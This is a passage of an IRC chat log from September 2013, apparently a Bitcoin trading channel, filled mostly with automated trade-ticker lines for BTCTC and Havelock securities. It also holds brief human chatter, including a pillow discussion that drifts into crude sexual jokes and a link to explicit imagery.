@ 0.12 BTC [-] Sep 05 16:51:19 [BTCTC] [BASIC-MINING] 20 @ 0.12 = 2.4 BTC [-] Sep 05 16:51:20 [BTCTC] [BASIC-MINING] 1 @ 0.1183 BTC [-] Sep 05 16:51:21 [BTCTC] [BASIC-MINING] 5 @ 0.11 = 0.55 BTC [-] Sep 05 16:51:22 [BTCTC] [LABCOIN] 340 @ 0.003414 = 1.1608 BTC [-] Sep 05 16:51:23 [BTCTC] [LABCOIN] 85 @ 0.003412 = 0.29 BTC [-] Sep 05 16:51:24 [BTCTC] [LABCOIN] 225 @ 0.003403 = 0.7657 BTC [-] Sep 05 16:51:25 [BTCTC] [LABCOIN] 200 @ 0.003403 = 0.6806 BTC [-] Sep 05 16:51:26 o wow Sep 05 16:51:27 [BTCTC] [LABCOIN] 900 @ 0.003402 = 3.0618 BTC [-] Sep 05 16:51:28 [BTCTC] [LABCOIN] 74 @ 0.003386 = 0.2506 BTC [-] Sep 05 16:51:29 [BTCTC] [LABCOIN] 98 @ 0.003385 = 0.3317 BTC [-] Sep 05 16:51:30 [BTCTC] [LABCOIN] 200 @ 0.003385 = 0.677 BTC [-] Sep 05 16:51:31 [BTCTC] [LABCOIN] 2868 @ 0.003363 = 9.6451 BTC [-] Sep 05 16:51:31 [BTCTC] [LABCOIN] 260 @ 0.003362 = 0.8741 BTC [-] Sep 05 16:51:32 [BTCTC] [LABCOIN] 3 @ 0.003362 = 0.0101 BTC [-] Sep 05 16:51:33 [BTCTC] [LABCOIN] 1393 @ 0.003361 = 4.6819 BTC [-] Sep 05 16:51:34 is Basic gonna go sub .0 Sep 05 16:51:43 [BTCTC] [BASIC-MINING] 31 @ 0.11 = 3.41 BTC [-] Sep 05 16:52:24 [BTCTC] [BASIC-MINING] 10 @ 0.1099 = 1.099 BTC [-] Sep 05 16:53:58 [BTCTC] [COGNITIVE] 16 @ 0.2828 = 4.5248 BTC [-] Sep 05 16:53:59 [BTCTC] [COGNITIVE] 1 @ 0.2827 BTC [-] Sep 05 16:54:01 [BTCTC] [COGNITIVE] 1 @ 0.2821 BTC [-] Sep 05 16:54:02 [BTCTC] [COGNITIVE] 5 @ 0.2762 = 1.381 BTC [-] Sep 05 16:54:03 [BTCTC] [COGNITIVE] 16 @ 0.276 = 4.416 BTC [-] Sep 05 16:54:04 [BTCTC] [COGNITIVE] 1 @ 0.2742 BTC [-] Sep 05 16:54:06 [BTCTC] [COGNITIVE] 1 @ 0.2718 BTC [-] Sep 05 16:54:06 [BTCTC] [COGNITIVE] 3 @ 0.262 = 0.786 BTC [-] Sep 05 16:54:07 [BTCTC] [COGNITIVE] 1 @ 0.2598 BTC [-] Sep 05 16:54:08 [BTCTC] [COGNITIVE] 1 @ 0.2551 BTC [-] Sep 05 16:54:09 [BTCTC] [COGNITIVE] 1 @ 0.244 BTC [-] Sep 05 16:54:10 [BTCTC] [COGNITIVE] 9 @ 0.24 = 2.16 BTC [-] Sep 05 16:54:11 [BTCTC] [COGNITIVE] 1 @ 0.2338 BTC [-] Sep 05 16:54:12 I haven't seen Chaang on here in some time Sep 05 16:54:13 [BTCTC] [COGNITIVE] 20 @ 0.2331 = 4.662 BTC [-] Sep 05 16:54:14 [BTCTC] [COGNITIVE] 2 @ 0.229 = 0.458 BTC [-] Sep 05 16:54:15 [BTCTC] [COGNITIVE] 1 @ 0.2111 BTC [-] Sep 05 16:54:16 [BTCTC] [COGNITIVE] 1 @ 0.2104 BTC [-] Sep 05 16:54:32 active anyways Sep 05 16:54:38 [BTCTC] [BASIC-MINING] 10 @ 0.1398 = 1.398 BTC [+] Sep 05 16:55:09 do you miss him? Sep 05 16:55:15 :( Sep 05 16:55:26 [BTCTC] [COGNITIVE] 39 @ 0.2 = 7.8 BTC [-] Sep 05 16:55:32 http://www.aljazeera.com/news/americas/2013/09/201394193231753347.html Sep 05 16:55:39 US Senate panel approves Syria strike - Americas - Al Jazeera English Sep 05 16:56:36 well btct is down now Sep 05 16:57:13 [BTCTC] [ASICMINER-PT] 1 @ 2.05 BTC [+] Sep 05 16:57:15 [BTCTC] [ASICMINER-PT] 1 @ 2.011 BTC [-] Sep 05 16:57:16 [BTCTC] [ASICMINER-PT] 9 @ 2.01 = 18.09 BTC [-] Sep 05 16:57:17 [BTCTC] [ASICMINER-PT] 1 @ 2.002 BTC [-] Sep 05 16:57:19 [BTCTC] [ASICMINER-PT] 1 @ 2.002 BTC [-] Sep 05 16:57:54 [BTCTC] [LABCOIN] 72 @ 0.003386 = 0.2438 BTC [+] Sep 05 16:57:56 [BTCTC] [LABCOIN] 290 @ 0.003385 = 0.9817 BTC [-] Sep 05 16:57:57 [BTCTC] [LABCOIN] 62 @ 0.003381 = 0.2096 BTC [-] Sep 05 16:57:58 [BTCTC] [LABCOIN] 250 @ 0.00338 = 0.845 BTC [-] Sep 05 16:57:58 [BTCTC] [LABCOIN] 326 @ 0.003368 = 1.098 BTC [-] Sep 05 16:58:14 [BTCTC] [ASICMINER-PT] 3 @ 2.002 = 6.006 BTC [-] Sep 05 16:58:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.02077 = 0.0415 BTC [-] Sep 05 16:58:26 [BTCTC] [TAT.ASICMINER] 20 @ 0.02051 = 0.4102 BTC [-] Sep 05 16:58:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.0205 = 0.082 BTC [-] Sep 05 16:58:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.0205 = 0.0615 BTC [-] Sep 05 16:58:45 [BTCTC] [ACTIVEMINING] 233 @ 0.004163 = 0.97 BTC [+] Sep 05 16:58:47 [BTCTC] [ACTIVEMINING] 73 @ 0.004159 = 0.3036 BTC [-] Sep 05 16:58:48 [BTCTC] [ACTIVEMINING] 40 @ 0.004153 = 0.1661 BTC [-] Sep 05 16:58:50 [BTCTC] [ASICMINER-PT] 1 @ 2.002 BTC [-] Sep 05 16:58:53 [BTCTC] [TAT.ASICMINER] 97 @ 0.0205 = 1.9885 BTC [-] Sep 05 16:59:02 [BTCTC] [ACTIVEMINING] 60 @ 0.004153 = 0.2492 BTC [-] Sep 05 16:59:16 [BTCTC] [ASICMINER-PT] 1 @ 2.002 BTC [-] Sep 05 16:59:17 [BTCTC] [LABCOIN] 290 @ 0.00337 = 0.9773 BTC [+] Sep 05 16:59:20 [BTCTC] [LABCOIN] 724 @ 0.003368 = 2.4384 BTC [-] Sep 05 16:59:21 [BTCTC] [LABCOIN] 986 @ 0.003367 = 3.3199 BTC [-] Sep 05 16:59:45 [BTCTC] [ASICMINER-PT] 1 @ 2.001 BTC [-] Sep 05 17:00:03 [BTCTC] [ASICMINER-PT] 3 @ 2.001 = 6.003 BTC [-] Sep 05 17:00:27 [BTCTC] [ASICMINER-PT] 15 @ 2 = 30 BTC [-] Sep 05 17:00:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.02046 = 0.0614 BTC [-] Sep 05 17:00:30 [BTCTC] [ASICMINER-PT] 2 @ 2 = 4 BTC [-] Sep 05 17:00:31 [BTCTC] [ASICMINER-PT] 10 @ 2 = 20 BTC [-] Sep 05 17:00:40 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 05 17:00:41 [BTCTC] [ASICMINER-PT] 2 @ 2.001 = 4.002 BTC [+] Sep 05 17:00:58 [BTCTC] [TAT.ASICMINER] 19 @ 0.02046 = 0.3887 BTC [-] Sep 05 17:00:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.02046 = 0.3069 BTC [-] Sep 05 17:01:02 [BTCTC] [ASICMINER-PT] 1 @ 2.001 BTC [+] Sep 05 17:01:16 [BTCTC] [ASICMINER-PT] 1 @ 2.001 BTC [+] Sep 05 17:01:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.02041 = 0.4082 BTC [-] Sep 05 17:01:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.02031 = 0.0812 BTC [-] Sep 05 17:01:33 [BTCTC] [TAT.ASICMINER] 24 @ 0.0202 = 0.4848 BTC [-] Sep 05 17:01:34 [BTCTC] [TAT.ASICMINER] 17 @ 0.02015 = 0.3426 BTC [-] Sep 05 17:01:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0201 BTC [-] Sep 05 17:01:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0201 BTC [-] Sep 05 17:01:54 [BTCTC] [TAT.ASICMINER] 100 @ 0.02007 = 2.007 BTC [-] Sep 05 17:03:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.02007 BTC [-] Sep 05 17:03:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.02006 = 0.1003 BTC [-] Sep 05 17:03:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.02006 = 0.2006 BTC [-] Sep 05 17:03:07 [BTCTC] [TAT.ASICMINER] 300 @ 0.02005 = 6.015 BTC [-] Sep 05 17:03:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02002 BTC [-] Sep 05 17:03:09 [BTCTC] [TAT.ASICMINER] 60 @ 0.02001 = 1.2006 BTC [-] Sep 05 17:03:11 [BTCTC] [TAT.ASICMINER] 67 @ 0.02 = 1.34 BTC [-] Sep 05 17:03:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.02 = 0.1 BTC [-] Sep 05 17:03:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.02 = 0.1 BTC [-] Sep 05 17:03:13 [BTCTC] [TAT.ASICMINER] 17 @ 0.02 = 0.34 BTC [-] Sep 05 17:03:15 [BTCTC] [TAT.ASICMINER] 35 @ 0.02 = 0.7 BTC [-] Sep 05 17:03:16 [BTCTC] [TAT.ASICMINER] 18 @ 0.02 = 0.36 BTC [-] Sep 05 17:03:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.02 = 0.04 BTC [-] Sep 05 17:03:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [-] Sep 05 17:03:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.02 = 1 BTC [-] Sep 05 17:03:20 [BTCTC] [TAT.ASICMINER] 199 @ 0.02 = 3.98 BTC [-] Sep 05 17:03:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [-] Sep 05 17:04:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.0199 = 0.0597 BTC [-] Sep 05 17:04:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0199 BTC [-] Sep 05 17:04:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.01885 = 0.2828 BTC [-] Sep 05 17:04:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.01882 = 0.0941 BTC [-] Sep 05 17:05:00 [BTCTC] [TAT.ASICMINER] 33 @ 0.01881 = 0.6207 BTC [-] Sep 05 17:05:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.0188 = 0.2068 BTC [-] Sep 05 17:05:02 [BTCTC] [TAT.ASICMINER] 129 @ 0.01801 = 2.3233 BTC [-] Sep 05 17:05:16 [BTCTC] [DMS.MINING] 100 @ 0.00235 = 0.235 BTC [+] Sep 05 17:05:17 [BTCTC] [DMS.MINING] 100 @ 0.002397 = 0.2397 BTC [+] Sep 05 17:05:18 [BTCTC] [DMS.MINING] 1 @ 0.002398 BTC [+] Sep 05 17:05:20 [BTCTC] [DMS.MINING] 700 @ 0.002398 = 1.6786 BTC [+] Sep 05 17:05:21 [BTCTC] [DMS.MINING] 1000 @ 0.002399 = 2.399 BTC [+] Sep 05 17:05:21 [BTCTC] [DMS.MINING] 200 @ 0.00243 = 0.486 BTC [+] Sep 05 17:05:35 [BTCTC] [TAT.ASICMINER] 27 @ 0.01801 = 0.4863 BTC [-] Sep 05 17:06:01 [MPEX] [S.MPOE] 2281 @ 0.00089133 = 2.0331 BTC [-] Sep 05 17:06:47 [BTCTC] [ACTIVEMINING] 40 @ 0.004397 = 0.1759 BTC [+] Sep 05 17:06:48 [BTCTC] [ACTIVEMINING] 73 @ 0.004397 = 0.321 BTC [+] Sep 05 17:08:23 [BTCTC] [BITVPS] 500 @ 0.00216 = 1.08 BTC [-] Sep 05 17:08:25 [BTCTC] [BITVPS] 100 @ 0.002155 = 0.2155 BTC [-] Sep 05 17:08:26 [BTCTC] [BITVPS] 400 @ 0.00215 = 0.86 BTC [-] Sep 05 17:09:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.01995 = 0.0399 BTC [+] Sep 05 17:11:53 [BTCTC] [LABCOIN] 2 @ 0.00342 = 0.0068 BTC [+] Sep 05 17:11:54 [BTCTC] [LABCOIN] 224 @ 0.003388 = 0.7589 BTC [-] Sep 05 17:11:55 [BTCTC] [LABCOIN] 90 @ 0.003386 = 0.3047 BTC [-] Sep 05 17:11:56 [BTCTC] [LABCOIN] 500 @ 0.003381 = 1.6905 BTC [-] Sep 05 17:11:57 [BTCTC] [LABCOIN] 450 @ 0.00338 = 1.521 BTC [-] Sep 05 17:11:58 [BTCTC] [LABCOIN] 62 @ 0.003372 = 0.2091 BTC [-] Sep 05 17:11:59 [BTCTC] [LABCOIN] 250 @ 0.003371 = 0.8428 BTC [-] Sep 05 17:12:01 [BTCTC] [LABCOIN] 220 @ 0.00337 = 0.7414 BTC [-] Sep 05 17:12:02 [BTCTC] [LABCOIN] 803 @ 0.003366 = 2.7029 BTC [-] Sep 05 17:12:03 [BTCTC] [LABCOIN] 2494 @ 0.003365 = 8.3923 BTC [-] Sep 05 17:12:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.01977 BTC [-] Sep 05 17:13:18 [BTCTC] [LABCOIN] 1 @ 0.00342 BTC [+] Sep 05 17:13:35 [HAVELOCK] [XBOND] 28 @ 0.00107301 = 0.03 BTC [-] Sep 05 17:15:29 [BTCTC] [TAT.ASICMINER] 27 @ 0.01968 = 0.5314 BTC [-] Sep 05 17:15:52 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [+] Sep 05 17:15:53 [BTCTC] [ASICMINER-PT] 1 @ 2.17 BTC [+] Sep 05 17:15:54 [BTCTC] [ASICMINER-PT] 2 @ 2.178 = 4.356 BTC [+] Sep 05 17:16:25 [BTCTC] [TAT.ASICMINER] 35 @ 0.01966 = 0.6881 BTC [-] Sep 05 17:16:51 [BTCTC] [ASICMINER-PT] 2 @ 2.185 = 4.37 BTC [+] Sep 05 17:16:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.01966 = 0.3932 BTC [-] Sep 05 17:16:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.01966 = 0.2949 BTC [-] Sep 05 17:18:28 [BTCTC] [TAT.ASICMINER] 24 @ 0.02009 = 0.4822 BTC [+] Sep 05 17:18:47 [HAVELOCK] [XBOND] 10 @ 0.00109 = 0.0109 BTC [+] Sep 05 17:19:18 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.0005 = 0.009 BTC [-] Sep 05 17:21:00 [BTCTC] [TAT.ASICMINER] 14 @ 0.02009 = 0.2813 BTC [+] Sep 05 17:21:30 [BTCTC] [DMS.MINING] 10 @ 0.00248 = 0.0248 BTC [+] Sep 05 17:22:01 [BTCTC] [ASICMINER-PT] 1 @ 2.169 BTC [-] Sep 05 17:22:55 [HAVELOCK] [AM100] 3 @ 0.0207 = 0.0621 BTC [+] Sep 05 17:23:22 [BTCTC] [ACTIVEMINING] 10 @ 0.004373 = 0.0437 BTC [-] Sep 05 17:23:53 [BTCTC] [LABCOIN] 1 @ 0.00345 BTC [+] Sep 05 17:25:30 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [+] Sep 05 17:25:39 [HAVELOCK] [XBOND] 43 @ 0.00107301 = 0.0461 BTC [-] Sep 05 17:25:47 [BTCTC] [ASICMINER-PT] 1 @ 2.179 BTC [-] Sep 05 17:26:00 [BTCTC] [TAT.ASICMINER] 33 @ 0.0201 = 0.6633 BTC [+] Sep 05 17:26:03 [BTCTC] [ASICMINER-PT] 1 @ 2.185 BTC [+] Sep 05 17:26:07 [HAVELOCK] [AM100] 2 @ 0.0217 = 0.0434 BTC [+] Sep 05 17:26:22 [BTCTC] [ASICMINER-PT] 1 @ 2.185 BTC [+] Sep 05 17:26:26 [HAVELOCK] [LABCO] 75 @ 0.00349 = 0.2618 BTC [-] Sep 05 17:26:47 [BTCTC] [ASICMINER-PT] 1 @ 2.185 BTC [+] Sep 05 17:26:56 [HAVELOCK] [XBOND] 3 @ 0.00111999 = 0.0034 BTC [+] Sep 05 17:27:05 [BTCTC] [LABCOIN] 198 @ 0.003371 = 0.6675 BTC [-] Sep 05 17:27:06 [BTCTC] [LABCOIN] 1323 @ 0.003371 = 4.4598 BTC [-] Sep 05 17:27:23 [BTCTC] [ASICMINER-PT] 1 @ 2.185 BTC [+] Sep 05 17:27:36 [BTCTC] [ASICMINER-PT] 1 @ 2.186 BTC [+] Sep 05 17:27:55 [HAVELOCK] [XBOND] 700 @ 0.00107301 = 0.7511 BTC [-] Sep 05 17:28:12 [BTCTC] [ASICMINER-PT] 1 @ 2.185 BTC [-] Sep 05 17:28:14 [BTCTC] [ASICMINER-PT] 1 @ 2.185 BTC [-] Sep 05 17:28:36 [HAVELOCK] [AM100] 20 @ 0.0217 = 0.434 BTC [+] Sep 05 17:29:02 [HAVELOCK] [AM100] 12 @ 0.022 = 0.264 BTC [+] Sep 05 17:29:49 [HAVELOCK] [AM100] 2 @ 0.02219999 = 0.0444 BTC [+] Sep 05 17:30:41 [BTCTC] [LABCOIN] 15 @ 0.003442 = 0.0516 BTC [+] Sep 05 17:32:54 [BTCTC] [COGNITIVE] 1 @ 0.2337 BTC [+] Sep 05 17:32:56 [MPEX] [S.MPOE] 1592 @ 0.00089218 = 1.4204 BTC [+] Sep 05 17:37:41 http://trilema.com/2013/smg-august-2013-statement/ Sep 05 17:37:45 S.MG, August 2013 Statement pe Trilema - Un blog de Mircea Popescu. Sep 05 17:40:32 [BTCTC] [LABCOIN] 176 @ 0.003376 = 0.5942 BTC [-] Sep 05 17:40:33 [BTCTC] [LABCOIN] 120 @ 0.003374 = 0.4049 BTC [-] Sep 05 17:40:35 [BTCTC] [LABCOIN] 304 @ 0.003371 = 1.0248 BTC [-] Sep 05 17:41:40 [BTCTC] [BASIC-MINING] 1 @ 0.1368 BTC [-] Sep 05 17:42:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.021 = 0.042 BTC [+] Sep 05 17:42:44 [HAVELOCK] [XBOND] 10 @ 0.00111999 = 0.0112 BTC [+] Sep 05 17:42:46 [BTCTC] [ASICMINER-PT] 3 @ 2.17 = 6.51 BTC [-] Sep 05 17:42:59 [HAVELOCK] [AM1] 1 @ 2.1 BTC [+] Sep 05 17:43:02 [BTCTC] [ASICMINER-PT] 5 @ 2.178 = 10.89 BTC [+] Sep 05 17:45:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.02127 = 0.0425 BTC [+] Sep 05 17:47:05 [HAVELOCK] [AM100] 2 @ 0.0218 = 0.0436 BTC [-] Sep 05 17:47:30 [BTCTC] [TAT.ASICMINER] 18 @ 0.02127 = 0.3829 BTC [+] Sep 05 17:48:16 [BTCTC] [ASICMINER-PT] 1 @ 2.187 BTC [+] Sep 05 17:48:32 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 05 17:48:45 [BTCTC] [LABCOIN] 1 @ 0.003435 BTC [+] Sep 05 17:51:22 [BTCTC] [DMS.MINING] 1 @ 0.002155 BTC [-] Sep 05 17:53:57 [HAVELOCK] [AM100] 4 @ 0.01990005 = 0.0796 BTC [-] Sep 05 17:56:26 [BTCTC] [COGNITIVE] 1 @ 0.2338 BTC [+] Sep 05 17:56:28 [BTCTC] [COGNITIVE] 1 @ 0.2349 BTC [+] Sep 05 17:56:29 [BTCTC] [COGNITIVE] 1 @ 0.2499 BTC [+] Sep 05 17:56:31 [BTCTC] [LABCOIN] 5 @ 0.003435 = 0.0172 BTC [+] Sep 05 17:58:22 [HAVELOCK] [AM1] 2 @ 2.2 = 4.4 BTC [+] Sep 05 18:01:01 [BTCTC] [S.MPOE-PT] 1 @ 0.0008978 BTC [-] Sep 05 18:02:51 [BTCTC] [ASICMINER-PT] 4 @ 2.187 = 8.748 BTC [+] Sep 05 18:03:53 [BTCTC] [ASICMINER-PT] 3 @ 2.199 = 6.597 BTC [+] Sep 05 18:04:43 [BTCTC] [COGNITIVE] 1 @ 0.2598 BTC [+] Sep 05 18:04:53 [BTCTC] [TAT.ASICMINER] 18 @ 0.021 = 0.378 BTC [-] Sep 05 18:05:20 [BTCTC] [BTC-GROWTH] 6 @ 0.101 = 0.606 BTC [+] Sep 05 18:05:22 [BTCTC] [S.MPOE-PT] 8 @ 0.0008978 = 0.0072 BTC [-] Sep 05 18:05:47 [BTCTC] [BASIC-MINING] 1 @ 0.1368 BTC [-] Sep 05 18:05:48 [BTCTC] [BASIC-MINING] 10 @ 0.1379 = 1.379 BTC [+] Sep 05 18:06:51 [BTCTC] [ASICMINER-PT] 1 @ 2.2 BTC [+] Sep 05 18:06:52 [BTCTC] [ASICMINER-PT] 2 @ 2.247 = 4.494 BTC [+] Sep 05 18:08:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.021 = 0.315 BTC [-] Sep 05 18:09:46 [BTCTC] [TAT.ASICMINER] 14 @ 0.02127 = 0.2978 BTC [+] Sep 05 18:11:48 [BTCTC] [ACTIVEMINING] 100 @ 0.00436 = 0.436 BTC [-] Sep 05 18:15:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02128 = 0.2128 BTC [+] Sep 05 18:15:46 [BTCTC] [TAT.ASICMINER] 31 @ 0.02187 = 0.678 BTC [+] Sep 05 18:17:48 [BTCTC] [ACTIVEMINING] 100 @ 0.004357 = 0.4357 BTC [-] Sep 05 18:17:50 [BTCTC] [ACTIVEMINING] 10 @ 0.004358 = 0.0436 BTC [+] Sep 05 18:18:01 [BTCTC] [KENILWORTH] 1 @ 0.001651 BTC [-] Sep 05 18:19:59 [BTCTC] [DMS.MINING] 250 @ 0.00235 = 0.5875 BTC [+] Sep 05 18:21:41 [BTCTC] [LABCOIN] 5 @ 0.00343 = 0.0172 BTC [-] Sep 05 18:22:42 [BTCTC] [DMS.MINING] 1 @ 0.002399 BTC [+] Sep 05 18:23:02 [BTCTC] [BMF] 2 @ 0.03586 = 0.0717 BTC [+] Sep 05 18:25:16 [BTCTC] [ASICMINER-PT] 4 @ 2.245 = 8.98 BTC [-] Sep 05 18:26:08 [BTCTC] [S.BBET-PT] 1 @ 0.001579 BTC [+] Sep 05 18:27:16 [BTCTC] [LABCOIN] 80 @ 0.003428 = 0.2742 BTC [-] Sep 05 18:27:18 [BTCTC] [LABCOIN] 5 @ 0.003429 = 0.0171 BTC [+] Sep 05 18:27:19 [BTCTC] [LABCOIN] 75 @ 0.003431 = 0.2573 BTC [+] Sep 05 18:27:20 [BTCTC] [LABCOIN] 1340 @ 0.003434 = 4.6016 BTC [+] Sep 05 18:28:22 [BTCTC] [LABCOIN] 1 @ 0.003434 BTC [+] Sep 05 18:28:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02186 BTC [-] Sep 05 18:28:40 [BTCTC] [ASICMINER-PT] 2 @ 2.22 = 4.44 BTC [-] Sep 05 18:28:50 [BTCTC] [LABCOIN] 1 @ 0.003434 BTC [+] Sep 05 18:29:09 [BTCTC] [DMS.MINING] 999 @ 0.002399 = 2.3966 BTC [+] Sep 05 18:29:27 [BTCTC] [DMS.MINING] 21 @ 0.0024 = 0.0504 BTC [+] Sep 05 18:30:01 [BTCTC] [LABCOIN] 1394 @ 0.003434 = 4.787 BTC [+] Sep 05 18:30:02 [BTCTC] [LABCOIN] 1392 @ 0.003435 = 4.7815 BTC [+] Sep 05 18:30:18 [BTCTC] [ACTIVEMINING] 10 @ 0.004356 = 0.0436 BTC [-] Sep 05 18:30:19 [BTCTC] [ACTIVEMINING] 278 @ 0.004356 = 1.211 BTC [-] Sep 05 18:30:20 [BTCTC] [ACTIVEMINING] 10 @ 0.004357 = 0.0436 BTC [+] Sep 05 18:30:22 [BTCTC] [ACTIVEMINING] 492 @ 0.004379 = 2.1545 BTC [+] Sep 05 18:30:52 [BTCTC] [LABCOIN] 2 @ 0.003435 = 0.0069 BTC [+] Sep 05 18:34:00 [BTCTC] [LABCOIN] 5 @ 0.003492 = 0.0175 BTC [+] Sep 05 18:41:20 [BTCTC] [ASICMINER-PT] 1 @ 2.22 BTC [-] Sep 05 18:42:06 [BTCTC] [S.BBET-PT] 2 @ 0.00158 = 0.0032 BTC [+] Sep 05 18:42:09 [BTCTC] [LABCOIN] 5 @ 0.003393 = 0.017 BTC [-] Sep 05 18:42:11 [BTCTC] [LABCOIN] 156 @ 0.003392 = 0.5292 BTC [-] Sep 05 18:42:12 [BTCTC] [LABCOIN] 530 @ 0.00339 = 1.7967 BTC [-] Sep 05 18:42:13 [BTCTC] [LABCOIN] 55 @ 0.003379 = 0.1858 BTC [-] Sep 05 18:42:15 [BTCTC] [LABCOIN] 222 @ 0.003378 = 0.7499 BTC [-] Sep 05 18:42:16 [BTCTC] [LABCOIN] 243 @ 0.003377 = 0.8206 BTC [-] Sep 05 18:42:17 [BTCTC] [LABCOIN] 475 @ 0.003376 = 1.6036 BTC [-] Sep 05 18:42:18 [BTCTC] [LABCOIN] 86 @ 0.003375 = 0.2903 BTC [-] Sep 05 18:43:25 [HAVELOCK] [XBOND] 1 @ 0.00111998 BTC [-] Sep 05 18:44:13 [HAVELOCK] [VTX] 1 @ 0.6000001 BTC [-] Sep 05 18:44:58 [HAVELOCK] [AM100] 2 @ 0.02159999 = 0.0432 BTC [+] Sep 05 18:45:52 [BTCTC] [ACTIVEMINING] 29 @ 0.0043 = 0.1247 BTC [-] Sep 05 18:45:59 [BTCTC] [LABCOIN] 156 @ 0.003377 = 0.5268 BTC [+] Sep 05 18:46:10 [BTCTC] [LABCOIN] 414 @ 0.003375 = 1.3973 BTC [-] Sep 05 18:46:17 [BTCTC] [LABCOIN] 61 @ 0.003373 = 0.2058 BTC [-] Sep 05 18:46:22 [BTCTC] [LABCOIN] 500 @ 0.003372 = 1.686 BTC [-] Sep 05 18:46:23 [BTCTC] [LABCOIN] 255 @ 0.003372 = 0.8599 BTC [-] Sep 05 18:46:25 [BTCTC] [LABCOIN] 276 @ 0.003371 = 0.9304 BTC [-] Sep 05 18:46:28 [HAVELOCK] [AM100] 3 @ 0.0218 = 0.0654 BTC [+] Sep 05 18:48:07 [BTCTC] [ACTIVEMINING] 900 @ 0.004379 = 3.9411 BTC [+] Sep 05 18:48:08 [BTCTC] [ACTIVEMINING] 900 @ 0.00438 = 3.942 BTC [+] Sep 05 18:49:13 [BTCTC] [LABCOIN] 34 @ 0.003374 = 0.1147 BTC [+] Sep 05 18:49:32 [BTCTC] [LABCOIN] 3 @ 0.003374 = 0.0101 BTC [+] Sep 05 18:49:33 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0005545 = 0.0039 BTC [+] Sep 05 18:50:34 [BTCTC] [ACTIVEMINING] 40 @ 0.004391 = 0.1756 BTC [+] Sep 05 18:50:37 [BTCTC] [ACTIVEMINING] 20 @ 0.004392 = 0.0878 BTC [+] Sep 05 18:50:39 [BTCTC] [ACTIVEMINING] 375 @ 0.004449 = 1.6684 BTC [+] Sep 05 18:51:14 [BTCTC] [ACTIVEMINING] 300 @ 0.004515 = 1.3545 BTC [+] Sep 05 18:51:34 So I'm in the market for a damn good gel memory foam pillow, any suggestions? Sep 05 18:51:48 [BTCTC] [ACTIVEMINING] 900 @ 0.004627 = 4.1643 BTC [+] Sep 05 18:52:06 what Sep 05 18:52:13 no such thing Sep 05 18:52:17 bah Sep 05 18:52:29 I was on woot, and it got me thinking. Sep 05 18:52:41 dunno i have a latex pillow Sep 05 18:52:46 [HAVELOCK] [AM100] 3 @ 0.0218 = 0.0654 BTC [+] Sep 05 18:52:56 and i'm not changing Sep 05 18:53:32 Good stuff? I'm just looking for one that won't go flat after 5 seconds. Sep 05 18:53:52 take a 200$ latex pillow and you should be fine Sep 05 18:54:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0005545 BTC [+] Sep 05 18:54:36 Hmmm, I will look into this. Sep 05 18:54:40 kakobrekla is your silicone pillow internal or external ? Sep 05 18:54:42 Thanks kakobrekla Sep 05 18:54:42 [BTCTC] [ACTIVEMINING] 300 @ 0.004626 = 1.3878 BTC [-] Sep 05 18:54:54 [BTCTC] [ASICMINER-PT] 1 @ 2.229 BTC [+] Sep 05 18:54:55 [BTCTC] [ACTIVEMINING] 400 @ 0.004515 = 1.806 BTC [-] Sep 05 18:55:00 hum? Sep 05 18:55:20 http://superficialgallery.com/wp-content/uploads/very-big-tits-2.jpg < internal Sep 05 18:55:30 lmao Sep 05 18:55:36 http://www.ctmliving.com/images/Yatsan/Hotel/MistySiliconPillow.jpg < external Sep 05 18:55:50 external Sep 05 18:56:07 Ah well Sep 05 18:56:10 internal would be handy Sep 05 18:56:15 my chick is flat Sep 05 18:56:23 does it self-warm ? Sep 05 18:56:24 Glad I was able to close that internal one quickly lol Sep 05 18:56:36 fuck you mircea_popescu. Sep 05 18:56:39 >D Sep 05 18:56:41 i cant have it all. Sep 05 18:56:42 lol Sep 05 18:57:17 which kind of prompts a new bedtime line. Sep 05 18:57:26 "honey, take off the pillowcase" Sep 05 18:57:32 hah Sep 05 19:00:23 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.0005545 = 0.0094 BTC [+] Sep 05 19:00:23 [BTCTC] [TAT.VIRTUALMINE] 48 @ 0.0005555 = 0.0267 BTC [+] Sep 05 19:00:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.0215 = 0.043 BTC [-] Sep 05 19:00:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.02159 = 0.0432 BTC [+] Sep 05 19:01:26 [BTCTC] 